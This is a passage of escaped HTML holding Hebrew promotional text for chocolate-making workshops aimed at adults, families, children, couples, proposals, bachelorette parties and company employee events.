\\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd.<br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd.<br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd 